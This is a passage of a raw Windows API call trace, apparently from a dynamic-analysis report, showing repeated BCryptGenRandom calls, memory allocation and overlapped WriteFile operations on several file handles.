lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.959] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.959] free (_Block=0x3e305b8) [0175.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.959] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.959] free (_Block=0x1fa91d0) [0175.959] free (_Block=0x1fa2ed8) [0175.959] free (_Block=0x1fa90b8) [0175.959] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.969] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.969] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.969] free (_Block=0x3e305b8) [0175.969] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.969] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.970] free (_Block=0x1fa91d0) [0175.970] free (_Block=0x1fa2ed8) [0175.970] free (_Block=0x1fa90b8) [0175.970] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.975] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.987] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.987] free (_Block=0x3e305b8) [0175.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.987] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.988] free (_Block=0x1fa91d0) [0175.988] free (_Block=0x1fa2ed8) [0175.988] free (_Block=0x1fa90b8) [0175.988] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.001] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.001] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.001] free (_Block=0x3e305b8) [0176.001] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.001] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.002] free (_Block=0x1fa91d0) [0176.002] free (_Block=0x1fa2ed8) [0176.002] free (_Block=0x1fa90b8) [0176.002] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.015] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.015] free (_Block=0x3e305b8) [0176.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.015] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.016] free (_Block=0x1fa91d0) [0176.016] free (_Block=0x1fa2ed8) [0176.016] free (_Block=0x1fa90b8) [0176.016] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.029] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.029] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.029] free (_Block=0x3e305b8) [0176.029] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.029] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.030] free (_Block=0x1fa91d0) [0176.030] free (_Block=0x1fa2ed8) [0176.030] free (_Block=0x1fa90b8) [0176.030] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.040] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.040] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.040] free (_Block=0x3e305b8) [0176.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.041] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.041] free (_Block=0x1fa91d0) [0176.041] free (_Block=0x1fa2ed8) [0176.041] free (_Block=0x1fa90b8) [0176.041] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.055] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.055] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.055] free (_Block=0x3e305b8) [0176.055] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.055] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.056] free (_Block=0x1fa91d0) [0176.056] free (_Block=0x1fa2ed8) [0176.056] free (_Block=0x1fa90b8) [0176.056] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.069] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.069] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.069] free (_Block=0x3e305b8) [0176.069] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.069] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.070] free (_Block=0x1fa91d0) [0176.070] free (_Block=0x1fa2ed8) [0176.070] free (_Block=0x1fa90b8) [0176.070] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.070] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.074] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.160] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.160] free (_Block=0x3e305b8) [0176.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.160] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.160] free (_Block=0x1fa91d0) [0176.160] free (_Block=0x1fa2ed8) [0176.160] free (_Block=0x1fa90b8) [0176.160] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.177] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.177] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.177] free (_Block=0x3e305b8) [0176.177] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.177] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.178] free (_Block=0x1fa91d0) [0176.178] free (_Block=0x1fa2ed8) [0176.178] free (_Block=0x1fa90b8) [0176.178] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.179] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.277] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.417] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.417] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.417] free (_Block=0x3e305b8) [0176.417] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.417] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.417] free (_Block=0x1fa91d0) [0176.417] free (_Block=0x1fa2ed8) [0176.417] free (_Block=0x1fa90b8) [0176.418] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.421] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x59e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.539] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.540] free (_Block=0x3e305b8) [0176.540] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.540] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.540] free (_Block=0x1fa91d0) [0176.540] free (_Block=0x1fa2ed8) [0176.540] free (_Block=0x1fa90b8) [0176.540] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.541] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0176.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0176.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0176.681] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.681] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.681] free (_Block=0x3e305b8) [0176.681] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.681] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.681] free (_Block=0x1fa91d0) [0176.681] free (_Block=0x1fa2ed8) [0176.681] free (_Block=0x1fa90b8) [0176.681] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.079] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.080] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.080] LoadLibraryA 